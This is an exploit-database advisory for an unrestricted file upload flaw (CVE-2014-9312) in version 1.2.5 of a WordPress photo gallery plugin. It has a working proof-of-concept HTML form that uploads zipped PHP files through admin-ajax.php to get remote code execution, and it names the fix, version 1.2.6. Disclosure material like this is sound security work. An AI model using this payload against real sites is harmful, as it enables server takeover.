Photo Gallery 1.2.5 Unrestricted File Upload

vendor:

Photo Gallery

by:

Kacper Szurek

8,8

CVSS

HIGH

Unrestricted File Upload

434

CWE

Product Name: Photo Gallery

Affected Version From: 1.2.5

Affected Version To: 1.2.5

Patch Exists: YES

Related CWE: CVE-2014-9312

CPE: a:wordpress:photo_gallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2014

Photo Gallery 1.2.5 Unrestricted File Upload

Every registered user (even Subscriber) can access upload functionality because of read role used inside UploadHandler.php. A proof of concept is provided which involves packing .php files into a .zip archive and sending it using a form. The files will be visible inside a specified directory.

Mitigation:

Update to version 1.2.6

Source

Exploit-DB raw data:

# Exploit Title: Photo Gallery 1.2.5 Unrestricted File Upload
# Date: 11-11-2014
# Software Link: https://wordpress.org/plugins/photo-gallery/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9312
# Category: webapps

1. Description
  
Every registered user (even Subscriber) can access upload functionality because of read role used inside UploadHandler.php

http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html
  
2. Proof of Concept

Login as regular user (created using wp-login.php?action=register).

Pack .php files into .zip archive then send it using:

<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/" enctype="multipart/form-data">
    <input type="file" name="files">
    <input type="submit" value="Hack!">
</form>

Your files will be visible inside:

http://wordpress-install/wp-admin/rce/
  
3. Solution:
  
Update to version 1.2.6
https://downloads.wordpress.org/plugin/photo-gallery.1.2.6.zip